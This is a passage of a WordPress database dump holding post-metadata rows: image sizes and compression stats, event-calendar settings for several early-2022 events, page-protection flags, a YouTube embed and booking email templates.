arge\";a:4:{s:4:\"file\";s:21:\"winter-4B-768x352.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:352;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:21:\"winter-4B-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:21:\"winter-4B-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:21:\"winter-4B-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:21:\"winter-4B-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"winter-4B-1536x703.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:703;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"winter-4B-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(152448,266123,'original-file','2022/01/winter-4B-updraft-pre-smush-original.jpg'),(152449,266123,'smush-info','The file was compressed from 476.07 KB to 443.14 KB saving 6.92 percent using WP-Optimize'),(152450,266123,'smush-complete','1'),(152451,266123,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:487496;s:12:\"smushed-size\";i:453774;s:15:\"savings-percent\";d:6.9199999999999999289457264239899814128875732421875;}'),(152454,91821,'_bgppb_default_editor','bgppb'),(152456,91821,'passster_activate_global_protection',NULL),(154299,265030,'_wp_old_date','2021-10-16'),(152459,266131,'protect_children',''),(152460,266131,'_bgppb_default_editor','bgppb'),(152461,266131,'_oembed_17282f16a653c991eb4e3d6f9f01f652','<iframe title=\"Eckankar Youth: Just Sing HU! - Ancient Spiritual Exercise\" width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/wc9N_g2NolA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(152462,266131,'_oembed_time_17282f16a653c991eb4e3d6f9f01f652','1641576938'),(152463,266131,'_edit_lock','1654485859:2'),(152464,266131,'_edit_last','2'),(152465,266131,'_wp_page_template','default'),(152466,266131,'passster_activate_global_protection',NULL),(152467,266131,'passster_activate_protection',NULL),(152468,266131,'passster_protection_type','password'),(152469,266131,'boldgrid_hide_page_title','0'),(152470,266131,'boldgrid_in_page_containers','1'),(152471,266131,'bgseo_robots_index','index'),(152472,266131,'bgseo_robots_follow','follow'),(152473,266134,'protect_children',''),(152474,266134,'passster_activate_global_protection',NULL),(152475,266134,'passster_activate_protection',NULL),(152476,266134,'passster_protection_type','password'),(152477,266134,'boldgrid_hide_page_title','0'),(152478,266134,'_bgppb_default_editor','bgppb'),(152479,266134,'boldgrid_in_page_containers','1'),(152480,266134,'_menu_item_type','post_type'),(152481,266134,'_menu_item_menu_item_parent','0'),(152482,266134,'_menu_item_object_id','266131'),(152483,266134,'_menu_item_object','page'),(152484,266134,'_menu_item_target',''),(152485,266134,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(152486,266134,'_menu_item_xfn',''),(152487,266134,'_menu_item_url',''),(152488,266153,'protect_children',''),(152489,266153,'mec_color',''),(152490,266153,'mec_location_id','118'),(152491,266153,'mec_dont_show_map','0'),(152492,266153,'mec_organizer_id','1'),(152493,266153,'mec_read_more',''),(152494,266153,'mec_more_info',''),(152495,266153,'mec_more_info_title',''),(152496,266153,'mec_more_info_target','_self'),(152497,266153,'mec_cost',''),(152498,266153,'mec_currency','a:0:{}'),(152499,266153,'mec_additional_organizer_ids','a:0:{}'),(152500,266153,'mec_additional_location_ids','a:0:{}'),(152501,266153,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-01-17\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-01-17\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(152502,266153,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(152503,266153,'mec_certain_weekdays','a:0:{}'),(152504,266153,'mec_allday','0'),(152505,266153,'one_occurrence','0'),(152506,266153,'mec_hide_time','0'),(152507,266153,'mec_hide_end_time','0'),(152508,266153,'mec_comment',''),(152509,266153,'mec_timezone','global'),(152510,266153,'mec_countdown_method','global'),(152511,266153,'mec_public','1'),(152512,266153,'mec_start_date','2022-01-17'),(152513,266153,'mec_start_time_hour','3'),(152514,266153,'mec_start_time_minutes','0'),(152515,266153,'mec_start_time_ampm','PM'),(152516,266153,'mec_start_day_seconds','54000'),(152517,266153,'mec_end_date','2022-01-17'),(152518,266153,'mec_end_time_hour','4'),(152519,266153,'mec_end_time_minutes','0'),(152520,266153,'mec_end_time_ampm','PM'),(152521,266153,'mec_end_day_seconds','57600'),(152522,266153,'mec_repeat_status','0'),(152523,266153,'mec_repeat_type',''),(152524,266153,'mec_repeat_interval','1'),(152525,266153,'mec_repeat_end',''),(152526,266153,'mec_repeat_end_at_occurrences',''),(152527,266153,'mec_repeat_end_at_date',''),(152528,266153,'mec_advanced_days','a:0:{}'),(152529,266153,'mec_in_days',''),(152530,266153,'mec_not_in_days',''),(152531,266153,'mec_hourly_schedules','a:0:{}'),(152532,266153,'mec_booking','a:0:{}'),(152533,266153,'mec_tickets','a:0:{}'),(152534,266153,'mec_fees_global_inheritance','1'),(152535,266153,'mec_fees','a:0:{}'),(152536,266153,'mec_ticket_variations_global_inheritance','1'),(152537,266153,'mec_ticket_variations','a:0:{}'),(152538,266153,'mec_reg_fields_global_inheritance','1'),(152539,266153,'mec_reg_fields','a:0:{}'),(152540,266153,'mec_bfixed_fields','a:0:{}'),(152541,266153,'mec_op','a:0:{}'),(152542,266153,'mec_fields','a:0:{}'),(152543,266153,'mec_event_status','EventScheduled'),(152544,266153,'mec_moved_online_link',''),(152545,266153,'mec_cancelled_reason',''),(152546,266153,'mec_display_cancellation_reason_in_single_page',''),(152547,266153,'boldgrid_hide_page_title','0'),(152548,266153,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(152549,266153,'passster_activate_global_protection',NULL),(152550,266153,'passster_activate_protection',NULL),(152551,266153,'passster_protection_type','password'),(152553,266153,'_dp_original','266104'),(152554,266153,'_edit_lock','1641745260:2'),(152555,266153,'_edit_last','2'),(152561,266155,'smush-info','The file was compressed from 49.52 KB to 47.92 KB saving 3.24 percent using WP-Optimize'),(152562,266155,'smush-complete','1'),(152563,266155,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:50707;s:12:\"smushed-size\";i:49065;s:15:\"savings-percent\";d:3.2400000000000002131628207280300557613372802734375;}'),(152566,266157,'_thumbnail_id','266155'),(152567,266157,'protect_children',''),(152568,266157,'mec_color',''),(152569,266157,'mec_location_id','118'),(152570,266157,'mec_dont_show_map','0'),(152571,266157,'mec_organizer_id','1'),(152572,266157,'mec_read_more',''),(152573,266157,'mec_more_info',''),(152574,266157,'mec_more_info_title',''),(152575,266157,'mec_more_info_target','_self'),(152576,266157,'mec_cost',''),(152577,266157,'mec_currency','a:0:{}'),(152578,266157,'mec_additional_organizer_ids','a:0:{}'),(152579,266157,'mec_additional_location_ids','a:0:{}'),(152580,266157,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-01-24\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-01-24\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(152581,266157,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(152582,266157,'mec_certain_weekdays','a:0:{}'),(152583,266157,'mec_allday','0'),(152584,266157,'one_occurrence','0'),(152585,266157,'mec_hide_time','0'),(152586,266157,'mec_hide_end_time','0'),(152587,266157,'mec_comment',''),(152588,266157,'mec_timezone','global'),(152589,266157,'mec_countdown_method','global'),(152590,266157,'mec_public','1'),(152591,266157,'mec_start_date','2022-01-24'),(152592,266157,'mec_start_time_hour','7'),(152593,266157,'mec_start_time_minutes','0'),(152594,266157,'mec_start_time_ampm','PM'),(152595,266157,'mec_start_day_seconds','68400'),(152596,266157,'mec_end_date','2022-01-24'),(152597,266157,'mec_end_time_hour','8'),(152598,266157,'mec_end_time_minutes','0'),(152599,266157,'mec_end_time_ampm','PM'),(152600,266157,'mec_end_day_seconds','72000'),(152601,266157,'mec_repeat_status','0'),(152602,266157,'mec_repeat_type',''),(152603,266157,'mec_repeat_interval','1'),(152604,266157,'mec_repeat_end',''),(152605,266157,'mec_repeat_end_at_occurrences',''),(152606,266157,'mec_repeat_end_at_date',''),(152607,266157,'mec_advanced_days','a:0:{}'),(152608,266157,'mec_in_days',''),(152609,266157,'mec_not_in_days',''),(152610,266157,'mec_hourly_schedules','a:0:{}'),(152611,266157,'mec_booking','a:0:{}'),(152612,266157,'mec_tickets','a:0:{}'),(152613,266157,'mec_fees_global_inheritance','1'),(152614,266157,'mec_fees','a:0:{}'),(152615,266157,'mec_ticket_variations_global_inheritance','1'),(152616,266157,'mec_ticket_variations','a:0:{}'),(152617,266157,'mec_reg_fields_global_inheritance','1'),(152618,266157,'mec_reg_fields','a:0:{}'),(152619,266157,'mec_bfixed_fields','a:0:{}'),(152620,266157,'mec_op','a:0:{}'),(152621,266157,'mec_fields','a:0:{}'),(152622,266157,'mec_event_status','EventScheduled'),(152623,266157,'mec_moved_online_link',''),(152624,266157,'mec_cancelled_reason',''),(152625,266157,'mec_display_cancellation_reason_in_single_page',''),(152626,266157,'boldgrid_hide_page_title','0'),(152627,266157,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(152628,266157,'passster_activate_global_protection',NULL),(152629,266157,'passster_activate_protection',NULL),(152630,266157,'passster_protection_type','password'),(152631,266157,'_dp_original','266104'),(152632,266157,'_edit_lock','1642611015:2'),(152633,266157,'_edit_last','2'),(152634,266159,'protect_children',''),(152635,266159,'mec_color',''),(152636,266159,'mec_location_id','118'),(152637,266159,'mec_dont_show_map','0'),(152638,266159,'mec_organizer_id','1'),(152639,266159,'mec_read_more',''),(152640,266159,'mec_more_info',''),(152641,266159,'mec_more_info_title',''),(152642,266159,'mec_more_info_target','_self'),(152643,266159,'mec_cost',''),(152644,266159,'mec_currency','a:0:{}'),(152645,266159,'mec_additional_organizer_ids','a:0:{}'),(152646,266159,'mec_additional_location_ids','a:0:{}'),(152647,266159,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-01-18\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-01-18\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(152648,266159,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(152649,266159,'mec_certain_weekdays','a:0:{}'),(152650,266159,'mec_allday','0'),(152651,266159,'one_occurrence','0'),(152652,266159,'mec_hide_time','0'),(152653,266159,'mec_hide_end_time','0'),(152654,266159,'mec_comment',''),(152655,266159,'mec_timezone','global'),(152656,266159,'mec_countdown_method','global'),(152657,266159,'mec_public','1'),(152658,266159,'mec_start_date','2022-01-18'),(152659,266159,'mec_start_time_hour','7'),(152660,266159,'mec_start_time_minutes','0'),(152661,266159,'mec_start_time_ampm','PM'),(152662,266159,'mec_start_day_seconds','68400'),(152663,266159,'mec_end_date','2022-01-18'),(152664,266159,'mec_end_time_hour','8'),(152665,266159,'mec_end_time_minutes','0'),(152666,266159,'mec_end_time_ampm','PM'),(152667,266159,'mec_end_day_seconds','72000'),(152668,266159,'mec_repeat_status','0'),(152669,266159,'mec_repeat_type',''),(152670,266159,'mec_repeat_interval','1'),(152671,266159,'mec_repeat_end',''),(152672,266159,'mec_repeat_end_at_occurrences',''),(152673,266159,'mec_repeat_end_at_date',''),(152674,266159,'mec_advanced_days','a:0:{}'),(152675,266159,'mec_in_days',''),(152676,266159,'mec_not_in_days',''),(152677,266159,'mec_hourly_schedules','a:0:{}'),(152678,266159,'mec_booking','a:0:{}'),(152679,266159,'mec_tickets','a:0:{}'),(152680,266159,'mec_fees_global_inheritance','1'),(152681,266159,'mec_fees','a:0:{}'),(152682,266159,'mec_ticket_variations_global_inheritance','1'),(152683,266159,'mec_ticket_variations','a:0:{}'),(152684,266159,'mec_reg_fields_global_inheritance','1'),(152685,266159,'mec_reg_fields','a:0:{}'),(152686,266159,'mec_bfixed_fields','a:0:{}'),(152687,266159,'mec_op','a:0:{}'),(152688,266159,'mec_fields','a:0:{}'),(152689,266159,'mec_event_status','EventScheduled'),(152690,266159,'mec_moved_online_link',''),(152691,266159,'mec_cancelled_reason',''),(152692,266159,'mec_display_cancellation_reason_in_single_page',''),(152693,266159,'boldgrid_hide_page_title','0'),(152694,266159,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(152695,266159,'passster_activate_global_protection',NULL),(152696,266159,'passster_activate_protection',NULL),(152697,266159,'passster_protection_type','password'),(152699,266159,'_dp_original','266104'),(152700,266159,'_edit_lock','1641747780:2'),(152701,266159,'_edit_last','2'),(152702,266160,'_wp_attached_file','2022/01/bird-sky-1.jpg'),(152703,266160,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:22:\"2022/01/bird-sky-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"bird-sky-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"bird-sky-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:22:\"bird-sky-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:22:\"bird-sky-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:22:\"bird-sky-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:22:\"bird-sky-1-300x380.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"bird-sky-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(152704,266159,'_thumbnail_id','266160'),(152705,266160,'original-file','2022/01/bird-sky-1-updraft-pre-smush-original.jpg'),(152706,266160,'smush-info','The file was compressed from 28.42 KB to 27.28 KB saving 4.01 percent using WP-Optimize'),(152707,266160,'smush-complete','1'),(152708,266160,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:29101;s:12:\"smushed-size\";i:27935;s:15:\"savings-percent\";d:4.0099999999999997868371792719699442386627197265625;}'),(154718,266296,'mec_bfixed_fields','a:0:{}'),(154719,266296,'mec_op','a:0:{}'),(154720,266296,'mec_fields','a:0:{}'),(154721,266296,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(154715,266296,'mec_ticket_variations','a:0:{}'),(154716,266296,'mec_reg_fields_global_inheritance','1'),(154717,266296,'mec_reg_fields','a:0:{}'),(154714,266296,'mec_ticket_variations_global_inheritance','1'),(154713,266296,'mec_fees','a:0:{}'),(154712,266296,'mec_fees_global_inheritance','1'),(154711,266296,'mec_tickets','a:0:{}'),(154710,266296,'mec_booking','a:0:{}'),(154709,266296,'mec_hourly_schedules','a:0:{}'),(154708,266296,'mec_not_in_days',''),(154707,266296,'mec_in_days',''),(154706,266296,'mec_advanced_days','a:0:{}'),(154705,266296,'mec_repeat_end_at_date',''),(154704,266296,'mec_repeat_end_at_occurrences',''),(154703,266296,'mec_repeat_end',''),(154702,266296,'mec_repeat_interval','1'),(154701,266296,'mec_repeat_type',''),(154700,266296,'mec_repeat_status','0'),(154699,266296,'mec_end_day_seconds','41400'),(154698,266296,'mec_end_time_ampm','AM'),(154697,266296,'mec_end_time_minutes','30'),(154696,266296,'mec_end_time_hour','11'),(154695,266296,'mec_end_date','2022-02-27'),(154694,266296,'mec_start_day_seconds','37800'),(154693,266296,'mec_start_time_ampm','AM'),(154692,266296,'mec_start_time_minutes','30'),(154691,266296,'mec_start_time_hour','10'),(154690,266296,'mec_start_date','2022-02-27'),(154689,266296,'mec_public','1'),(154688,266296,'mec_countdown_method','global'),(154687,266296,'mec_timezone','global'),(154686,266296,'mec_comment',''),(154675,266296,'mec_cost',''),(154676,266296,'mec_currency','a:0:{}'),(154677,266296,'mec_additional_organizer_ids','a:0:{}'),(154678,266296,'mec_additional_location_ids','a:0:{}'),(154679,266296,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-02-27\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-02-27\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(154680,266296,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(154681,266296,'mec_certain_weekdays','a:0:{}'),(154682,266296,'mec_allday','0'),(154683,266296,'one_occurrence','0'),(154684,266296,'mec_hide_time','0'),(154685,266296,'mec_hide_end_time','0'),(154674,266296,'mec_more_info_target','_self'),(154673,266296,'mec_more_info_title',''),(154672,266296,'mec_more_info',''),(154671,266296,'mec_read_more',''),(154670,266296,'mec_organizer_id','1'),(154669,266296,'mec_dont_show_map','0'),(161652,266676,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-05-22\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-05-22\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(154209,266266,'_field_224','Mack'),(193900,269230,'smush-complete','1'),(193901,269230,'smush-info','The file was compressed from 787.02 KB to 725.37 KB, saving 7.83 percent, using WP-Optimize'),(193902,269230,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:805906;s:12:\"smushed-size\";i:742781;s:15:\"savings-percent\";d:7.8300000000000000710542735760100185871124267578125;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:805906;s:10:\"compressed\";i:742781;}s:6:\"medium\";a:2:{s:8:\"original\";i:29630;s:10:\"compressed\";i:27190;}s:5:\"large\";a:2:{s:8:\"original\";i:216797;s:10:\"compressed\";i:200969;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9368;s:10:\"compressed\";i:9094;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:126986;s:10:\"compressed\";i:116472;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:34427;s:10:\"compressed\";i:31744;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:88989;s:10:\"compressed\";i:83089;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:61646;s:10:\"compressed\";i:56575;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:41770;s:10:\"compressed\";i:38507;}s:8:\"tileview\";a:2:{s:8:\"original\";i:42144;s:10:\"compressed\";i:39082;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:444778;s:10:\"compressed\";i:420352;}}}'),(193899,269230,'origi